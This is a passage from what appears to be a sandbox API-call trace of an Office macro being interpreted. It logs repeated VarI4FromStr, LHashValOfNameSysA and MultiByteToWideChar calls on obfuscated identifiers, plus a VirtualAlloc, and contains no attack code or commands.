10 [0067.860] VarI4FromStr (in: strIn="144080024", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] VarI4FromStr (in: strIn="964111583", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wcDU1AA") returned 0x10a687 [0067.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.860] VarI4FromStr (in: strIn="229156437", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] VarI4FromStr (in: strIn="772312101", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.860] VarI4FromStr (in: strIn="375455348", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] VarI4FromStr (in: strIn="334002455", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.860] VarI4FromStr (in: strIn="839369781", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DQXGA_A") returned 0x107826 [0067.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.860] VarI4FromStr (in: strIn="271179802", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAQkAUA") returned 0x10dc9c [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jZCADD") returned 0x10ee58 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DAAGDA") returned 0x10bb18 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rU4DAQAU") returned 0x1040d3 [0067.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.861] VarI4FromStr (in: strIn="415288120", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SkXAAA4w") returned 0x10e7d5 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="axxUDCcZ") returned 0x10e4a9 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zBDcAD") returned 0x107b55 [0067.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.861] VarI4FromStr (in: strIn="174783016", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.861] VarI4FromStr (in: strIn="63340667", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.861] VarI4FromStr (in: strIn="138443673", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.861] VarI4FromStr (in: strIn="479353848", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.861] VarI4FromStr (in: strIn="249188246", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VAAoX_QQ") returned 0x10d390 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mAUBGA4") returned 0x10ccd0 [0067.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.861] VarI4FromStr (in: strIn="54232899", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.861] VarI4FromStr (in: strIn="197350363", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mQAXA_") returned 0x100031 [0067.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.861] VarI4FromStr (in: strIn="723690746", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.862] VarI4FromStr (in: strIn="534083149", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.862] VarI4FromStr (in: strIn="89297380", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.862] VarI4FromStr (in: strIn="794158700", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.862] VarI4FromStr (in: strIn="721463827", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fB1DAA") returned 0x100efc [0067.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.862] VarI4FromStr (in: strIn="839440744", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IDGAQZAQ") returned 0x109aa4 [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tGAcGAx") returned 0x105b7b [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iB_BABAA") returned 0x10f29d [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MABAD_D") returned 0x10270c [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LZAGwc") returned 0x10b2f8 [0067.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.862] VarI4FromStr (in: strIn="781385264", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GQwA_A") returned 0x103896 [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nAcGC_") returned 0x10292a [0067.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fAUUZGC") returned 0x10285a [0067.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.862] VarI4FromStr (in: strIn="612887648", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] VarI4FromStr (in: strIn="197326054", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] VarI4FromStr (in: strIn="596823338", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] VarI4FromStr (in: strIn="307387461", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] VarI4FromStr (in: strIn="787650214", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tDcUQA") returned 0x10b3dd [0067.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IQCAUAo") returned 0x107b96 [0067.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.863] VarI4FromStr (in: strIn="488000559", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] VarI4FromStr (in: strIn="267958614", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LAUUAQ_") returned 0x10135a [0067.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.863] VarI4FromStr (in: strIn="827253643", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] VarI4FromStr (in: strIn="621231127", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.863] VarI4FromStr (in: strIn="438439695", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] VarI4FromStr (in: strIn="869602146", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.863] VarI4FromStr (in: strIn="502873210", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aB4GBCGk") returned 0x10e22c [0067.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.863] VarI4FromStr (in: strIn="3916952", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m_CAAUA") returned 0x1040af [0067.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SACBAAA") returned 0x10d976 [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dXkokX") returned 0x10bb9c [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDAABB") returned 0x1039ac [0067.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.864] VarI4FromStr (in: strIn="546413460", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oADADA") returned 0x10e5ae [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jcDD1c_G") returned 0x10a8d6 [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="co1Q1UDU") returned 0x10b75d [0067.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.864] VarI4FromStr (in: strIn="908803526", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.864] VarI4FromStr (in: strIn="224016871", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.864] VarI4FromStr (in: strIn="528702704", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.864] VarI4FromStr (in: strIn="504664371", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.864] VarI4FromStr (in: strIn="990699870", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DBUDQZ") returned 0x10b068 [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="z_X4wAUA") returned 0x108bea [0067.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.864] VarI4FromStr (in: strIn="243586987", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.864] VarI4FromStr (in: strIn="35178906", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jAxAGoGk") returned 0x1072cd [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.864] VarI4FromStr (in: strIn="17553946", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.864] VarI4FromStr (in: strIn="401569569", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.865] VarI4FromStr (in: strIn="173987685", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.865] VarI4FromStr (in: strIn="979703950", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.865] VarI4FromStr (in: strIn="695647102", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WQ1AAU") returned 0x10f6f1 [0067.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.865] VarI4FromStr (in: strIn="999275293", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DAAGQQ") returned 0x10bd09 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fXcAoAAU") returned 0x101879 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="k4BDQABA") returned 0x107da8 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ABAcAA") returned 0x10f330 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PUAxADGA") returned 0x108816 [0067.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.865] VarI4FromStr (in: strIn="448627982", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YACBQ1") returned 0x10af3f [0067.865] CExposedStream::Read () returned 0x0 [0067.865] CExposedStream::Read () returned 0x0 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDDGDAZ") returned 0x10af54 [0067.865] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ABAQXA4c") returned 0x109c08 [0067.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.865] VarI4FromStr (in: strIn="430884347", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.865] VarI4FromStr (in: strIn="693081007", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.866] VarI4FromStr (in: strIn="256541165", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.866] VarI4FromStr (in: strIn="209756604", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.866] VarI4FromStr (in: strIn="421551971", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wU1DAA") returned 0x104e5f [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mAUDwAAo") returned 0x102051 [0067.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.866] VarI4FromStr (in: strIn="834074723", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.866] VarI4FromStr (in: strIn="4348768", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="f__11ABD") returned 0x10f254 [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.866] VarI4FromStr (in: strIn="594151235", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.866] VarI4FromStr (in: strIn="245113200", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.866] VarI4FromStr (in: strIn="405683751", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.866] VarI4FromStr (in: strIn="618174847", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.866] VarI4FromStr (in: strIn="323909848", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kok1AAAU") returned 0x109de0 [0067.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.866] VarI4FromStr (in: strIn="641798800", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UCXAAXBA") returned 0x1067d0 [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.867] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XAQxAA") returned 0x1035e9 [0067.867] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kcDDQkA") returned 0x108c69 [0067.867] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.867] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAAAZAc") returned 0x102be6 [0067.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.867] VarI4FromStr (in: strIn="259503371", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.867] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FUAUABGA") returned 0x10d0ac [0067.867] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAGwD1A4") returned 0x10f51d [0067.867] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jDADUAAX") returned 0x1059fd [0067.867] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b90000 [0067.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.867] VarI4FromStr (in: strIn="952029067", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.867] VarI4FromStr (in: strIn="294438452", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.867] VarI4FromStr (in: strIn="799944094", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.867] VarI4FromStr (in: strIn="765583372", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.868] VarI4FromStr (in: strIn="810197414", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qU4QwkU") returned 0x1099d5 [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bAAAQwZ") returned 0x1023d5 [0067.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.868] VarI4FromStr (in: strIn="367121235", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.868] VarI4FromStr (in: strIn="701392688", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BUwGxB") returned 0x102dd2 [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.868] VarI4FromStr (in: strIn="490429357", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.868] VarI4FromStr (in: strIn="474502912", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.868] VarI4FromStr (in: strIn="42649479", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.868] VarI4FromStr (in: strIn="988259831", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.868] VarI4FromStr (in: strIn="359381217", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hQAADA") returned 0x101434 [0067.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.868] VarI4FromStr (in: strIn="754815090", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wBDDDAAQ") returned 0x10f69b [0067.868] LHashValOfNameSysA 